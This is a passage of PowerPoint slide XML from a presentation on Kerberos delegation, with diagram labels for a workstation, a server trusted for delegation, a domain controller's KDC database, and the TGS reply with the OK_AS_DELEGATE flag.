            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Picture 5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169693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="Picture 5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025668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="TextBox 55"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="TextBox 56"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="TextBox 58"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3845238" y="4588337"/>
              <a:ext cx="1784954" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400"/>
                <a:t>Service Key</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145955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left)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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Workstation Small"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203769" y="1127129"/>
            <a:ext cx="2745305" cy="2451771"/>
            <a:chOff x="195776" y="2708920"/>
            <a:chExt cx="2745305" cy="2451771"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="152" name="Picture 1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155" y="2855866"/>
              <a:ext cx="2695926" cy="2304825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="153" name="TextBox 152"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="2939970"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="160" name="TextBox 159"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3183336"/>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161" name="Picture 1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866" y="3457211"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="162" name="TextBox 161"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="3482148"/>
              <a:ext cx="1789823"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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="163" name="Picture 1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776" y="2708920"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="164" name="Picture 1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6939" y="3898005"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="165" name="Picture 1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8493" y="4323782"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4. TGS Reply with OK_AS_DELEGATE flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Right Arrow 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3097225" y="1841466"/>
            <a:ext cx="2502616"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4. KRB_TGS_REP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>HTTP/Web1</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:ln w="0"/>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="dk1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="92" name="Group 91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="152030" y="4844491"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="93" name="Picture 9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69693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="94" name="Picture 9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25668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="TextBox 94"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>trusted</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>for</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>delegation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="TextBox 95"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="97" name="Picture 9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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="TextBox 97"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="129" name="Reply Content"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3100941" y="2048971"/>
            <a:ext cx="2500581" cy="1948004"/>
            <a:chOff x="3338458" y="2980453"/>
            <a:chExt cx="2500581" cy="1948004"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="130" name="Group 129"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3338458" y="2980453"/>
              <a:ext cx="2500581" cy="1948004"/>
              <a:chOff x="3111530" y="3857261"/>
              <a:chExt cx="2500581" cy="1948004"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="132" name="Group 131"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3111530" y="3857261"/>
                <a:ext cx="2500581" cy="1948004"/>
                <a:chOff x="3111530" y="3857261"/>
                <a:chExt cx="2500581" cy="1948004"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="134" name="Group 133"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="3111530" y="3857261"/>
                  <a:ext cx="2500581" cy="1948004"/>
                  <a:chOff x="3111530" y="3857261"/>
                  <a:chExt cx="2500581" cy="1948004"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="136" name="Rectangle 135"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3111530" y="3857261"/>
                    <a:ext cx="2500581" cy="194800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spcAft>
                        <a:spcPts val="1500"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:endParaRPr lang="de-DE" sz="1400" dirty="0">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="137" name="TextBox 136"/>
                  <p:cNvSpPr txBox="1"/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3692408" y="4173468"/>
                    <a:ext cx="1671680" cy="1631216"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                    <a:spAutoFit/>
                  </a:bodyPr>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Ticket Information (ok </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                      <a:t>as</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t> </a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                      <a:t>delegate</a:t>
                    </a:r>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>)</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Session Key</a:t>
                    </a:r>
                  </a:p>
                  <a:p>
                    <a:pPr>
                      <a:spcAft>
                        <a:spcPts val="3000"/>
                      </a:spcAft>
                    </a:pPr>
                    <a:r>
                      <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                      <a:t>Service Ticket</a:t>
                    </a:r>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="135" name="Picture 1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94617" y="3957926"/>
                  <a:ext cx="351058" cy="573771"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="133" name="Picture 1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20279" y="4682786"/>
                <a:ext cx="380199" cy="375562"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="131" name="Picture 13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419874" y="4432339"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="180" name="Group 179"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5762801" y="1116830"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="1415706"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="181" name="Picture 1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78" y="1597989"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="182" name="TextBox 181"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="1698030"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="TextBox 182"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="1957026"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="184" name="Picture 1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3374" y="2303223"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="TextBox 184"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="2363506"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="186" name="Picture 18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71714" y="1415706"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="187" name="Picture 18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19698" y="3450877"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="188" name="Picture 18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178170" y="2812347"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="189" name="Picture 18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86185" y="3298419"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Curved Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4211961" y="4153218"/>
            <a:ext cx="1550841" cy="746156"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100086"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="59" name="Group 58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="204587" y="1124744"/>
            <a:ext cx="2744487" cy="3312979"/>
            <a:chOff x="204587" y="1124744"/>
            <a:chExt cx="2744487" cy="3312979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="192" name="Picture 19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48390" y="1275402"/>
              <a:ext cx="2700684" cy="3162321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="193" name="Picture 19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7684" y="3264942"/>
              <a:ext cx="475522" cy="315018"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="194" name="TextBox 193"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="321623" y="1355794"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="195" name="TextBox 194"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="321624" y="1599160"/>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196" name="Picture 1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677" y="1873035"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="197" name="Picture 19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587" y="1124744"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="198" name="Picture 19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5750" y="2313829"/>
              <a:ext cx="472016" cy="312696"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="199" name="Picture 19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7304" y="2739606"/>
              <a:ext cx="348452" cy="348452"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="201" name="TextBox 200"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="918031" y="1900853"/>
              <a:ext cx="1789823" cy="2277547"/>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Ticket</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Ticket-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>Granting</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> Service Session Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Ticket </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>(ok </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>as</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
                <a:t>delegate</a:t>
